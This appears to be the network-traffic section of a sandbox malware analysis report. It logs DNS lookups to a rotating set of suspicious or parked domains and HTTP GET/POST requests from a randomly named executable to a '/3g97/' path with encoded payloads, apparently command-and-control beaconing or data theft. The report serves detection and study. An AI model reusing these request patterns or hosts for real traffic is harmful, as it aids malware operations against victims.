                                                                                              Apr 24, 2024 07:29:18.696398020 CEST804978291.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:18.696456909 CEST804978291.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:18.696639061 CEST4978280192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:29:19.903095007 CEST4978280192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:29:20.921638966 CEST4978380192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:29:21.228995085 CEST804978391.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:21.229274988 CEST4978380192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:29:21.231363058 CEST4978380192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:29:21.579596043 CEST804978391.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:21.588248968 CEST804978391.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:21.588273048 CEST804978391.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:21.588346958 CEST4978380192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:29:23.121925116 CEST4978380192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:29:24.140319109 CEST4978480192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:29:24.445261002 CEST804978491.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:24.445346117 CEST4978480192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:29:24.447482109 CEST4978480192.168.2.491.195.240.19
                                                                                              Apr 24, 2024 07:29:24.752186060 CEST804978491.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:24.752211094 CEST804978491.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:24.752228022 CEST804978491.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:24.752295017 CEST804978491.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:24.752331972 CEST804978491.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:24.752511978 CEST804978491.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:24.752530098 CEST804978491.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:24.763474941 CEST804978491.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:24.763514042 CEST804978491.195.240.19192.168.2.4
                                                                                              Apr 24, 2024 07:29:24.763597965 CEST4978480192.168.2.491.195.240.19

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Apr 24, 2024 07:26:06.431082010 CEST5304653192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:26:06.629376888 CEST53530461.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:26:22.382654905 CEST5565653192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:26:22.797044039 CEST53556561.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:26:37.766870975 CEST5102553192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:26:37.960792065 CEST53510251.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:26:46.054127932 CEST5160553192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:26:46.275193930 CEST53516051.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:27:00.595058918 CEST5871053192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:27:00.892350912 CEST53587101.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:27:15.969609976 CEST5961453192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:27:16.327651978 CEST53596141.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:27:31.375391960 CEST5351353192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:27:31.864826918 CEST53535131.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:27:46.501581907 CEST5104753192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:27:46.989042044 CEST53510471.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:28:02.453902960 CEST5499553192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:28:02.832731962 CEST53549951.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:28:16.828180075 CEST5248553192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:28:17.135101080 CEST53524851.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:28:30.704941988 CEST5780853192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:28:31.715653896 CEST5780853192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:28:31.820724964 CEST53578081.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:28:31.869611979 CEST53578081.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:28:46.234805107 CEST5500353192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:28:46.487632036 CEST53550031.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:29:01.297986984 CEST5953753192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:29:01.460392952 CEST53595371.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:29:09.517828941 CEST5817553192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:29:09.679650068 CEST53581751.1.1.1192.168.2.4
                                                                                              Apr 24, 2024 07:29:17.750794888 CEST5978653192.168.2.41.1.1.1
                                                                                              Apr 24, 2024 07:29:18.081370115 CEST53597861.1.1.1192.168.2.4

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Apr 24, 2024 07:26:06.431082010 CEST192.168.2.41.1.1.10x206Standard query (0)www.jthzbrdb.funA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:26:22.382654905 CEST192.168.2.41.1.1.10x38daStandard query (0)www.a-two-spa-salon.comA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:26:37.766870975 CEST192.168.2.41.1.1.10x8790Standard query (0)www.ordinarythoughts.orgA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:26:46.054127932 CEST192.168.2.41.1.1.10x2c85Standard query (0)www.mz3fk6g3.sbsA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:27:00.595058918 CEST192.168.2.41.1.1.10xefcbStandard query (0)www.heldhold.lifeA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:27:15.969609976 CEST192.168.2.41.1.1.10x7b04Standard query (0)www.tavernadoheroi.storeA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:27:31.375391960 CEST192.168.2.41.1.1.10xeb9bStandard query (0)www.carliente.comA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:27:46.501581907 CEST192.168.2.41.1.1.10xe1ccStandard query (0)www.paydayloans3.shopA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:02.453902960 CEST192.168.2.41.1.1.10x9164Standard query (0)www.kansaiwoody.comA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:16.828180075 CEST192.168.2.41.1.1.10x3fa3Standard query (0)www.corvidemporium.comA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:30.704941988 CEST192.168.2.41.1.1.10xd54bStandard query (0)www.levelstep.onlineA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:31.715653896 CEST192.168.2.41.1.1.10xd54bStandard query (0)www.levelstep.onlineA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:46.234805107 CEST192.168.2.41.1.1.10x14fbStandard query (0)www.brothedboil.comA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:29:01.297986984 CEST192.168.2.41.1.1.10xac77Standard query (0)www.alpine3dcreations.comA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:29:09.517828941 CEST192.168.2.41.1.1.10x55a9Standard query (0)www.mervadohome.comA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:29:17.750794888 CEST192.168.2.41.1.1.10xe16fStandard query (0)www.tondex.financeA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Apr 24, 2024 07:26:06.629376888 CEST1.1.1.1192.168.2.40x206No error (0)www.jthzbrdb.fun80.240.20.220A (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:26:22.797044039 CEST1.1.1.1192.168.2.40x38daNo error (0)www.a-two-spa-salon.com157.7.107.63A (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:26:37.960792065 CEST1.1.1.1192.168.2.40x8790Name error (3)www.ordinarythoughts.orgnonenoneA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:26:46.275193930 CEST1.1.1.1192.168.2.40x2c85No error (0)www.mz3fk6g3.sbs172.217.16.36A (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:27:00.892350912 CEST1.1.1.1192.168.2.40xefcbNo error (0)www.heldhold.life203.161.46.103A (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:27:16.327651978 CEST1.1.1.1192.168.2.40x7b04No error (0)www.tavernadoheroi.storetavernadoheroi.storeCNAME (Canonical name)IN (0x0001)false
                                                                                              Apr 24, 2024 07:27:16.327651978 CEST1.1.1.1192.168.2.40x7b04No error (0)tavernadoheroi.store162.240.81.18A (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:27:31.864826918 CEST1.1.1.1192.168.2.40xeb9bNo error (0)www.carliente.comcarliente.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Apr 24, 2024 07:27:31.864826918 CEST1.1.1.1192.168.2.40xeb9bNo error (0)carliente.com217.160.0.111A (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:27:46.989042044 CEST1.1.1.1192.168.2.40xe1ccNo error (0)www.paydayloans3.shop64.190.62.22A (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:02.832731962 CEST1.1.1.1192.168.2.40x9164No error (0)www.kansaiwoody.com118.27.122.214A (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:17.135101080 CEST1.1.1.1192.168.2.40x3fa3No error (0)www.corvidemporium.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:17.135101080 CEST1.1.1.1192.168.2.40x3fa3No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:17.135101080 CEST1.1.1.1192.168.2.40x3fa3No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:31.820724964 CEST1.1.1.1192.168.2.40xd54bNo error (0)www.levelstep.onlinelevelstep.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:31.820724964 CEST1.1.1.1192.168.2.40xd54bNo error (0)levelstep.online31.186.11.254A (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:31.869611979 CEST1.1.1.1192.168.2.40xd54bNo error (0)www.levelstep.onlinelevelstep.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:31.869611979 CEST1.1.1.1192.168.2.40xd54bNo error (0)levelstep.online31.186.11.254A (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:46.487632036 CEST1.1.1.1192.168.2.40x14fbNo error (0)www.brothedboil.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Apr 24, 2024 07:28:46.487632036 CEST1.1.1.1192.168.2.40x14fbNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:29:01.460392952 CEST1.1.1.1192.168.2.40xac77Name error (3)www.alpine3dcreations.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:29:09.679650068 CEST1.1.1.1192.168.2.40x55a9Name error (3)www.mervadohome.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Apr 24, 2024 07:29:18.081370115 CEST1.1.1.1192.168.2.40xe16fNo error (0)www.tondex.financeparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Apr 24, 2024 07:29:18.081370115 CEST1.1.1.1192.168.2.40xe16fNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • www.jthzbrdb.fun
                                                                                              • www.a-two-spa-salon.com
                                                                                              • www.mz3fk6g3.sbs
                                                                                              • www.heldhold.life
                                                                                              • www.tavernadoheroi.store
                                                                                              • www.carliente.com
                                                                                              • www.paydayloans3.shop
                                                                                              • www.kansaiwoody.com
                                                                                              • www.corvidemporium.com
                                                                                              • www.levelstep.online
                                                                                              • www.brothedboil.com
                                                                                              • www.tondex.finance

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.44974080.240.20.220801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:26:07.020849943 CEST454OUTGET /3g97/?AlB=sdJPX&12l42=0byNfP8xYbFTvv3TFTBCb86kR2BGbvQk+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhMgT0gLImR5/DqviqEDtH5dgpFLFfPLyFVKE= HTTP/1.1
                                                                                              Host: www.jthzbrdb.fun
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:26:07.322947025 CEST1289INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Wed, 24 Apr 2024 05:26:07 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 1409
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              ETag: "629dd94c-581"
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 68 6f 73 74 6e 61 6d 65 2e 64 6f 6d 61 69 6e 2e 74 6c 64 2f 22 3e 68 6f 73 74 6e 61 6d 65 2e 64 6f 6d 61 69 6e 2e 74 6c 64 3c 2f 61 3e 3c 2f 70 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:375px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:375px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><body> <p><a href="http://hostname.domain.tld/">hostname.domain.tld</a></p> <h1>404
                                                                                              Apr 24, 2024 07:26:07.322971106 CEST309INData Raw: 3c 2f 68 31 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 77 65 72 65 20 74 72 79 69 6e 67 20 74 6f 20 72 65
                                                                                              Data Ascii: </h1> <h2>Page Not Found</h2> <div> The page you were trying to reach does not exist. Or, maybe it has moved. You can start again from <a href="http://hostname.domain.tld/">home</a> or go back to the <a href="javascript


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449742157.7.107.63801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:26:23.075793982 CEST746OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.a-two-spa-salon.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.a-two-spa-salon.com
                                                                                              Referer: http://www.a-two-spa-salon.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 34 36 6a 39 69 4f 35 61 67 71 4d 35 72 4d 78 46 39 53 47 65 4f 74 31 68 4e 66 42 67 4f 2b 75 6d 48 71 34 64 4c 4a 67 6b 4b 52 42 31 65 38 64 2f 50 6e 43 4f 58 73 31 2b 51 34 69 74 33 74 6a 61 6a 77 61 5a 53 50 70 6e 66 63 32 32 5a 7a 4f 50 45 42 62 51 61 6c 62 58 67 50 6a 71 6e 69 6e 54 2f 55 34 34 59 57 39 72 57 6d 58 4a 55 77 39 55 79 77 30 5a 56 2b 54 44 6e 41 4f 36 64 68 46 57 2f 49 72 62 47 71 72 62 46 4c 47 73 4e 37 39 57 34 46 55 35 2f 7a 66 6e 66 41 30 56 75 67 74 70 52 70 49 64 46 53 55 41 66 36 70 74 45 38 77 4c 49 37 46 2f 78 77 2f 59 53 64 4a 7a 45 56 4d 62 4f 67 3d 3d
                                                                                              Data Ascii: 12l42=46j9iO5agqM5rMxF9SGeOt1hNfBgO+umHq4dLJgkKRB1e8d/PnCOXs1+Q4it3tjajwaZSPpnfc22ZzOPEBbQalbXgPjqninT/U44YW9rWmXJUw9Uyw0ZV+TDnAO6dhFW/IrbGqrbFLGsN79W4FU5/zfnfA0VugtpRpIdFSUAf6ptE8wLI7F/xw/YSdJzEVMbOg==
                                                                                              Apr 24, 2024 07:26:23.555524111 CEST1289INHTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:26:23 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Server: Apache
                                                                                              X-Powered-By: PHP/8.2.18
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                                              Data Raw: 33 62 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78
                                                                                              Data Ascii: 3b58<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="tex
                                                                                              Apr 24, 2024 07:26:23.555547953 CEST1289INData Raw: 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77
